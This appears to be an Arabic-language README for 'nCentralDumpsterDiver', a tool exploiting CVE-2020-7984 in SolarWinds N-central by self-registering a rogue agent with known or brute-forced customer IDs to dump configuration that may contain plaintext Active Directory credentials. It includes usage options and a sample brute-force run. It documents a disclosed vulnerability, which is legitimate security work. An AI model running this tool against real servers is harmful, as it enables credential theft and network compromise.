
استخدم هذا التطبيق ميزة Self Registration لإنشاء وكيل مارق يقوم بعد ذلك بتفريغ إعدادات ApplianceConfiguration التي قد تحتوي أو لا تحتوي على معلومات مثل كلمات مرور كنص عادي. تم الإبلاغ عن ذلك إلى SolarWinds PSIRT في 10/10/2019 مع استجابة قليلة جدًا.
تم إصدار إصلاحات/حلول بديلة، للمزيد من المعلومات: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7984
يستخدم هذا التطبيق مكتبات nCentral الخاصة بعميل (agent) dot net لمحاكاة تسجيل العميل وسحب إعدادات تكوين العميل/الجهاز. يمكن أن تحتوي هذه المعلومات على بيانات اعتماد نطاق Active Directory بنص واضح. تم الإبلاغ عن ذلك إلى SolarWinds PSIRT ([email protected]) في 10/10/2019. في معظم الحالات، لا يكون رابط تنزيل العميل (agent) محميًا، مما يسمح لأي شخص دون تفويض وبمعرف عميل معروف بتنزيل برنامج العميل. بمجرد حصولك على معرف العميل، يمكنك التسجيل ذاتيًا وسحب التكوين. سيقوم التطبيق باختبار توفر معرف العميل عبر رابط تنزيل العميل. إذا نجح الاختبار، فسيسحب التكوين. لا نحاول سحب التكوين مباشرة لأن انتهاء مهلة العملية يستغرق وقتًا طويلاً. قد تؤدي إزالة الفحص الأولي إلى نتائج أكثر حيث قد يكون تنزيل العميل محظورًا بينما لا يكون اتصال العميل كذلك.
تُستخدم Harmony فقط لمنع مكتبات nCentral من حفظ وإنشاء دليل "config" غير مطلوب.
nCentralDumpsterDiver 1.0.0.0
Copyright c 2020
ERROR(S):
Required option 'u, url' is missing.
-u, --url Required. URLs to be Processed
-i, --id Customer IDs to try processing, will be excluded from bruteforce
-b, --bruteforce (Default: false) Enable Customer ID BruteForce
--min (Default: 100) Minimum Customer ID to try for bruteforce.
--max (Default: 200) Maximum Customer ID to try for bruteforce.
--help Display this help screen.
--version Display version information.`
C:\Storage\nCentralDumpsterDiver>nCentralDumpsterDiver.exe -u https://nable.localhost.localdomain/ -b
[10:49:00 INF] Processing https://nable.localhost.localdomain/ started
[10:49:00 INF] Starting bruteforce, this will exclude any previously specified customer id(s)

